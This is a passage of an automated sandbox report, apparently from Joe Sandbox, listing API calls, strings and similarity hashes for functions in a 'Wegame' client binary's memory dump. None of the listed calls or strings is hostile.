                                                                  • Part of subcall function 00428780: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00000000,0042304C), ref: 004287C0
                                                                  • Part of subcall function 00428780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,0042304C), ref: 004287E9
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(000000D0,?,00000000,?,?,?,?,00422F4E), ref: 004285BD
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00004000,?,?,?,?,?,?,?,00422F4E), ref: 004285CD
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00422F4E), ref: 00428603
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00422F4E), ref: 0042875F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: free$malloc
                                                                • String ID: 1.2.5$N/B
                                                                • API String ID: 2190258309-2277431266
                                                                • Opcode ID: 3f57712760d94e11327135a48cbf9edde4548a6039fa25a6f0739e8d63c455e8
                                                                • Instruction ID: 61a3aa9aad1a52163fdec6738f066cb7dfab65519c0a573732084c654ad5121d
                                                                • Opcode Fuzzy Hash: 3f57712760d94e11327135a48cbf9edde4548a6039fa25a6f0739e8d63c455e8
                                                                • Instruction Fuzzy Hash: 7F5137B1A01B159BD320CF69E88079AF7E0FF48318F504A2ED99E87741DB75B498CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,?), ref: 0045043A
                                                                • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 00450453
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045048B
                                                                • memmove.VCRUNTIME140(?,00000000,?), ref: 00450498
                                                                • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 004504AE
                                                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 004504DC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@freadmemmove
                                                                • String ID:
                                                                • API String ID: 418166761-0
                                                                • Opcode ID: 6eafa354046522e6660deda5cb973dbfd154baf2a9e0b5838e6dce209d1402a0
                                                                • Instruction ID: afa618f58e3e94be8eb50a2a60ba4f114ae13452b9576e258ae28143417118d8
                                                                • Opcode Fuzzy Hash: 6eafa354046522e6660deda5cb973dbfd154baf2a9e0b5838e6dce209d1402a0
                                                                • Instruction Fuzzy Hash: BD21BF3AA00209EBCF249F69CD4469E7BB5FF45342F04842AFE0897252D738DD59CB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 00450513
                                                                • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 0045052C
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450560
                                                                • memmove.VCRUNTIME140(00000000,?,?), ref: 0045056D
                                                                • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 00450583
                                                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 004505A3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwritememmove
                                                                • String ID:
                                                                • API String ID: 4148317875-0
                                                                • Opcode ID: 9ecbb36e08bbaade886083dcdc8416934afdd2f447d2f65a840fdd0312aaff6a
                                                                • Instruction ID: 5dff355223c14c524a2034df7665b917349f8d921c974d8eeee79c885f2b65c5
                                                                • Opcode Fuzzy Hash: 9ecbb36e08bbaade886083dcdc8416934afdd2f447d2f65a840fdd0312aaff6a
                                                                • Instruction Fuzzy Hash: C7218D7AA1021CBBCF14CF6CC844A8E7BB5AF44712F04452AFC19D3212E779D9588F88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C174,unexpected end of data,?,?,?,?,?,?,?,?), ref: 00454F13
                                                                Strings
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID: expected ' or "$expected =$expected >$expected attribute name$unexpected end of data
                                                                • API String ID: 432778473-2454120470
                                                                • Opcode ID: dd476e555283d591a2dfd6daaf052d37d32cfe7c3a0fd1b43c276b0caf7a3054
                                                                • Instruction ID: ec9a66d078045d9903f77caf713da43aad7e90607ce14e2b7ad29992db215a54
                                                                • Opcode Fuzzy Hash: dd476e555283d591a2dfd6daaf052d37d32cfe7c3a0fd1b43c276b0caf7a3054
                                                                • Instruction Fuzzy Hash: A711E6B1104104AECB14AF65D843CAE77A9EF95319B24080FFC815B283DB6C9989CB6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040AD5F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040ADBF
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?,?,?,?,00471F38,000000FF), ref: 0040AE02
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00471F38,000000FF), ref: 0040AE30
                                                                Strings
                                                                • VFSHelper::UpdateKey() , xrefs: 0040AE18
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$EnterLeave
                                                                • String ID: VFSHelper::UpdateKey()
                                                                • API String ID: 4256121347-2141629103
                                                                • Opcode ID: 87e162c1bf225c4a4558edd9a76979cbe765f74ce119fed3ffa3e49b6d992a4d
                                                                • Instruction ID: 2efd3ce37363fb834d004f871117e12d701acc8a980839d67c9130e104af5cd0
                                                                • Opcode Fuzzy Hash: 87e162c1bf225c4a4558edd9a76979cbe765f74ce119fed3ffa3e49b6d992a4d
                                                                • Instruction Fuzzy Hash: 7E31E8725102009FD714DF15ED89BAFB7A5EF85315F00062EF406D7B90D77CA9448759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046229B
                                                                  • Part of subcall function 00455EDC: __EH_prolog3.LIBCMT ref: 00455EE3
                                                                  • Part of subcall function 00455EDC: ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000018,00000000,void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,0000033C), ref: 00455EE8
                                                                  • Part of subcall function 00455EDC: ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(0000033C,?,00000018,00000000,void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,0000033C), ref: 00455EF6
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 004622E8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045F764,?,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,?,?,?), ref: 00462309
                                                                Strings
                                                                • [main]query g_ComNetBar failed, xrefs: 00462341
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0046232D
                                                                Similarity
                                                                • API ID: ?find_component@?get_comp_mgr_instance@common@ierd_tgp@@?get_log_instance@base@@Component@common@ierd_tgp@@@std@@Component_mgr@12@Component_mgr@common@ierd_tgp@@H_prolog3H_prolog3_Logger@1@SimpleString::operator=V?$weak_ptr@Vcomponent_interface_type@23@@
                                                                • String ID: [main]query g_ComNetBar failed$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1370719927-2189767750
                                                                • Opcode ID: 6ee55594ebaa18aa6719b982faec77be26f942a98f6a93cfb8c211927ccd39c7
                                                                • Instruction ID: 967abd53f6e70246a9151380aa4e0288bc7a56215d7ca662635c563c278ca3fd
                                                                • Opcode Fuzzy Hash: 6ee55594ebaa18aa6719b982faec77be26f942a98f6a93cfb8c211927ccd39c7
                                                                • Instruction Fuzzy Hash: 00218631D05609AADB10EFA5C492ADEBBB4AF18304F64405EE414BB382DB7C5E45CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(TenFact.dll), ref: 00448B0F
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 00448B27
                                                                  • Part of subcall function 00448B8E: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,00000104), ref: 00448BCF
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,00000104), ref: 00448B52
                                                                  • Part of subcall function 00448D44: memset.VCRUNTIME140(?,00000000,00000208,?,?,00000104), ref: 00448D70
                                                                • LoadLibraryW.KERNEL32(?,?,?,00000104,?,?,00000104), ref: 00448B77
                                                                Strings
                                                                Similarity
                                                                • API ID: memset$HandleLibraryLoadModule
                                                                • String ID: TenFact.dll
                                                                • API String ID: 118576328-3270610849
                                                                • Opcode ID: e9885ec3c9c9dc75fdd6d0e9dc93c10e43d88fbaf5ca6e4cc18d422f19f274f4
                                                                • Instruction ID: e2168cdeb4e8de6ba0010cd4c1f6e575bdf6046f04e6787e6fd6cf5319d6633e
                                                                • Opcode Fuzzy Hash: e9885ec3c9c9dc75fdd6d0e9dc93c10e43d88fbaf5ca6e4cc18d422f19f274f4
                                                                • Instruction Fuzzy Hash: 6101DBF1E0021CABDB10EB61DC45EDF777CDB54714F00407AF909D3141DA74AE4486A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,?,?,?), ref: 0040CDAE
                                                                • memmove.VCRUNTIME140(?,?,?,00000000,?,?,?), ref: 0040CDBC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 0040CE07
                                                                • memmove.VCRUNTIME140(00000000,?,?,?), ref: 0040CE0F
                                                                • memmove.VCRUNTIME140(?,?,?,00000000,?,?,?), ref: 0040CE1B
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: 787b6c3063f94cecf2d4a1c3ef1f4272d9f4903e8e79dca3ede8bfe775034dfd
                                                                • Instruction ID: f8ea38dd0b494531f686fef03280e553818120a66b6cd39b568dde0a114c868d
                                                                • Opcode Fuzzy Hash: 787b6c3063f94cecf2d4a1c3ef1f4272d9f4903e8e79dca3ede8bfe775034dfd
                                                                • Instruction Fuzzy Hash: EE41D272A00108DFCB14DF68D88189E7BA5EF89314B21077FF815EB291EA34E9518BD6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AC2F
                                                                • ?_Pninc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEPA_WXZ.MSVCP140 ref: 0046AC54
                                                                Similarity
                                                                • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@Pninc@?$basic_streambuf@_U?$char_traits@U?$char_traits@_W@std@@@std@@
                                                                • String ID:
                                                                • API String ID: 3900108780-0
                                                                • Opcode ID: 29d2af33c128d9fd550ecb7634a3e7ddf0dabe5b0ad389d093f9baf1002a4484
                                                                • Instruction ID: 61f0fda4fddf025674b36bba42c54de2ba5996ec2ed1d396d5b3e9480d6cc709
                                                                • Opcode Fuzzy Hash: 29d2af33c128d9fd550ecb7634a3e7ddf0dabe5b0ad389d093f9baf1002a4484
                                                                • Instruction Fuzzy Hash: A1419475A00A06EFC715DF2CC4845A9BBF1FF49314B15816AE905A7B50EB34ED60CF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 00410B03
                                                                • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00410B4C
                                                                • _wrmdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,?), ref: 00410B6C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00410BD7
                                                                Similarity
                                                                • API ID: AttributesFile_invalid_parameter_noinfo_noreturn_waccess_wrmdir
                                                                • String ID:
                                                                • API String ID: 2283794684-0
                                                                • Opcode ID: d0a39d18cabc653a7a71fca42115314f8f4771884829b125f7586ceb45877b6f
                                                                • Instruction ID: 6ed8446aa5e37d2c6d336e6f56b93559b5f36098a9c574b6d0b005bc18fa01b8
                                                                • Opcode Fuzzy Hash: d0a39d18cabc653a7a71fca42115314f8f4771884829b125f7586ceb45877b6f
                                                                • Instruction Fuzzy Hash: 51317C716182449FD700CF69D845B9BBBE8AF89309F10892EF898C2250E778E1C9CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C281
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,00000000,00000003,00000001,000000B0,0045448F,?,?,0000003C,?,0049C138,004A6870,004A6988,0000003C,?,0049C138), ref: 0046C2A9
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C2B8
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C2F7
                                                                  • Part of subcall function 00450FE5: __EH_prolog3_catch.LIBCMT ref: 00450FEC
                                                                  • Part of subcall function 00450FE5: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,0000004C,0046C243,?,?), ref: 0045101F
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451052
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451086
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045109C
                                                                  • Part of subcall function 00450FE5: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004510D4
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,0000004C,0046C243,?,?), ref: 0045115B
                                                                  • Part of subcall function 00450FE5: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451173
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C2DC
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@H_prolog3_catchV01@_V?$basic_streambuf@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 2548761292-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C1F6
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?,00000003,00000001,000000B0,004543EB,?,?,0000003C,?,0049C138,004A6988,004A6870), ref: 0046C21B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C22A
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C269
                                                                  • Part of subcall function 00450FE5: __EH_prolog3_catch.LIBCMT ref: 00450FEC
                                                                  • Part of subcall function 00450FE5: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,0000004C,0046C243,?,?), ref: 0045101F
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451052
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451086
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045109C
                                                                  • Part of subcall function 00450FE5: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004510D4
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,0000004C,0046C243,?,?), ref: 0045115B
                                                                  • Part of subcall function 00450FE5: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451173
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C24E
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@H_prolog3_catchV01@V?$basic_streambuf@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 1469493847-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C30F
                                                                  • Part of subcall function 00459268: __EH_prolog3.LIBCMT ref: 0045926F
                                                                  • Part of subcall function 00459268: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C325,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C,?,0049C138), ref: 00459293
                                                                  • Part of subcall function 00459268: ??0?$basic_iostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C325,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C), ref: 004592AC
                                                                • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z.MSVCP140(?,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C,?,0049C138,004A6870), ref: 0046C334
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C343
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C382
                                                                  • Part of subcall function 0045119A: __EH_prolog3_catch.LIBCMT ref: 004511A1
                                                                  • Part of subcall function 0045119A: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,00000000,00000048,0046C35C,?,?), ref: 004511D4
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000000), ref: 00451207
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451239
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045124F
                                                                  • Part of subcall function 0045119A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP140 ref: 0045128A
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,00000000,00000048,0046C35C,?,?), ref: 00451319
                                                                  • Part of subcall function 0045119A: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451331
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C367
                                                                Similarity
                                                                • API ID: U?$char_traits@_$?width@ios_base@std@@W@std@@@std@@$Bios_base@std@@D@std@@@std@@H_prolog3U?$char_traits@$??0?$basic_ios@_??0?$basic_iostream@_??1?$basic_ios@??6?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@_H_prolog3_catchV01@V?$basic_streambuf@_Vlocale@2@W@std@@@1@@
                                                                • String ID:
                                                                • API String ID: 3452098428-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C0E4
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,00454379,?,00000000), ref: 0046C118
                                                                • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP140(?), ref: 0046C12B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C13A
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C155
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 288696274-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C16D
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,004545BA,004A6988,004A6988,004A6870,004A6988,0000003C,?,0049C138,004A6988), ref: 0046C1A1
                                                                • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_K@Z.MSVCP140(?), ref: 0046C1B4
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C1C3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C1DE
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 288696274-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Similarity
                                                                • API ID: memset$DebugOutputString
                                                                • String ID: VFileSysBase::WriteFile() $VFileSysBase::WriteFile() $list<T> too long
                                                                • API String ID: 1905100485-2447007464
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 004181F1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 0041825B
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 0041828F
                                                                Strings
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturnfree
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2444646146-1285458680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,85A35C35), ref: 004105E7
                                                                • FindClose.KERNEL32(00000000,?,?,85A35C35), ref: 00410693
